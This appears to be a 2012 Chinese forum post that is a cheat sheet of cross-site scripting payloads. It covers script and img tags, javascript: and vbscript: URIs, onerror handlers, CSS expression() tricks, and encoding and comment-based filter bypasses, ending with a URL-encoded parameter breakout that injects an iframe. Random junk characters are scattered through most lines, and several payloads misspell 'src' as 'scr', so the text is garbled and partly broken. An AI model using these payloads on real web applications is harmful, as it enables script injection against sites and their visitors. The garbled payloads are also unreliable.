<script>alert("跨站")</script> (最常用)5 i7 U8 Y- g) e+ { Z0 C1 W) \
<img scr=javascript:alert("跨站")></img>
" U. q. g4 u8 W7 h<img scr="javascript: alert(/跨站/)></img>/ n, ?! p) y# R. t
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)( O; o* l) D7 ^- b% o
<img scr="#" onerror=alert(/跨站/)></img>! t8 x$ Z- ~/ L! Y- A! m6 E
<img scr="#" style="xss:expression(alert(/xss/));"></img>
% } s& Y8 C5 J6 ~<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
/ M& _- U) q) P<img src=vbscript:msgbox ("xss")></img># L) D6 o/ e: l7 a$ x
<style> input {left:expression (alert('xss'))}</style>4 @7 n& {7 f: q3 {' c
<div style={left:expression (alert('xss'))}></div>) V8 s# Y8 [& t* O
<div style={left:exp/* */ression (alert('xss'))}></div>
/ e4 g, M" K `% u7 N/ B<div style={left:\0065\0078ression (alert('xss'))}></div>
: B( c, R; [$ s5 p" A* \html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
; B6 _7 |0 q7 g* X& O4 Funicode <div style="{left:expRessioN (alert('xss'))}">
! ?& v. j. T& `. a) t. Z |) L. u0 t$ [; p
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
* O- U( _0 _! q+ b4 l6 @ |
发表于 2012-9-15 14:09:13
收藏
分享
支持
反对